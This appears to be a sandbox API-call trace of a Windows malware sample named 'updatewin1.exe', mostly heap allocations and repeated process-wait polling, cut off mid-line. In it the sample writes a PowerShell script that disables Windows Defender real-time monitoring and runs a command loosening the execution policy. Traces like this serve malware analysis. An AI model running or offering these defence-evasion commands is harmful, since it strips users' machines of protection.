!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÖª1ÅHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.817] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x80) returned 0x32a0d8 [0045.817] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe")) returned 0x5f [0045.817] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xdc) returned 0x32c168 [0045.817] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0045.817] GetLastError () returned 0x0 [0045.818] GetEnvironmentStringsW () returned 0x32c250* [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0xaca) returned 0x32cd28 [0045.818] FreeEnvironmentStringsW (penv=0x32c250) returned 1 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x98) returned 0x32c250 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x32c2f0 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x6c) returned 0x32c338 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x6e) returned 0x32c3b0 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x78) returned 0x311188 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x62) returned 0x32c428 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x3152d8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x32c498 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x32a160 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1a) returned 0x32bd18 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x4a) returned 0x32c4e8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x72) returned 0x311208 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x315310 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x315348 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1c) returned 0x32bd40 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xd2) returned 0x32c540 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x7c) returned 0x32c620 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32c6a8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3a) returned 0x32c6e8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x90) returned 0x32c730 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x32c7c8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x315380 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32c7f8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x32c838 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32c888 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3c) returned 0x32d818 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x82) returned 0x32c8e8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x3153b8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1e) returned 0x32bd68 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x3153f0 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x54) returned 0x32c978 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32c9d8 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2a) returned 0x315428 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3c) returned 0x32d860 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x54) returned 0x32ca38 [0045.818] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x32ca98 [0045.819] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x315460 [0045.819] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x8c) returned 0x32cac8 [0045.819] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32cd28 | out: hHeap=0x300000) returned 1 [0045.819] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x800) returned 0x32cb60 [0045.819] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.820] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0045.941] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0045.942] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" --Admin" [0045.942] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x32d368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" [0045.942] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0045.955] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0045.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0045.955] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0045.955] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0045.955] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0045.956] CloseHandle (hObject=0xa8) returned 1 [0045.956] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x70) returned 0x32ecd8 [0045.957] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x90) returned 0x32ed50 [0045.957] SetLastError (dwErrCode=0x0) [0045.957] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0045.957] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xa2c, dwThreadId=0xa30)) returned 1 [0045.971] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0045.980] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0045.995] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.012] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.107] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.120] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.135] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.151] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.168] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.182] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.198] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.214] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.229] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.244] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.260] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.275] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.291] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.307] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.322] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.338] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.353] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.369] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.385] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.400] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.444] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.447] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.463] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.478] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.494] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.512] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.526] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.555] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.556] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.572] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.589] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.666] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.790] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.884] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0046.956] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.014] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.072] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.166] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.215] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.263] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.336] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.372] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.417] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.462] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.508] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.544] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.558] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.841] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.868] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.897] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0047.946] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.092] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.102] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.120] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.143] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.162] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.179] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.195] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.256] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.336] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.388] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.417] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.686] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.695] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.727] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.771] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.775] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.802] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.804] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.819] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.838] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.850] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.866] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.888] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.910] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.913] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.940] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.948] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.975] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0048.990] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.022] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.055] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.075] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.085] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.100] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.121] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.133] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.146] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.163] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.193] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.210] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.225] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.240] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.258] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.271] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.287] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.304] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.318] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.364] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.394] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.397] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.446] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.475] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.496] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.514] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.524] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.536] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.554] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.570] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.587] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.598] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.619] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.630] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.646] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.663] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.681] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.692] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.739] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.755] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.779] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.786] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.832] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.861] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.865] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.880] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.900] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.911] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.932] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.943] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.959] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.973] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0049.994] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.004] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.020] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.039] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.071] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.082] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.099] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.121] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.134] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.148] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.160] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.182] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.192] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.207] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.240] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.275] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.285] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.300] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.316] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.362] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.363] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.384] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.402] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.416] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.441] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.488] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.505] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.520] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.537] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.566] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.612] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.643] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.646] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.668] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.692] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.711] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.722] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.739] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.768] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.793] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.801] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.845] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.849] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.867] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.883] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.936] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0050.941] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.019] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.041] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.066] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.082] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.101] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.150] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.173] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.178] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.190] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.209] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.225] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.244] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.252] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.275] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.299] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.322] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.330] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.377] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.403] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0051.412] WaitForSingleObject 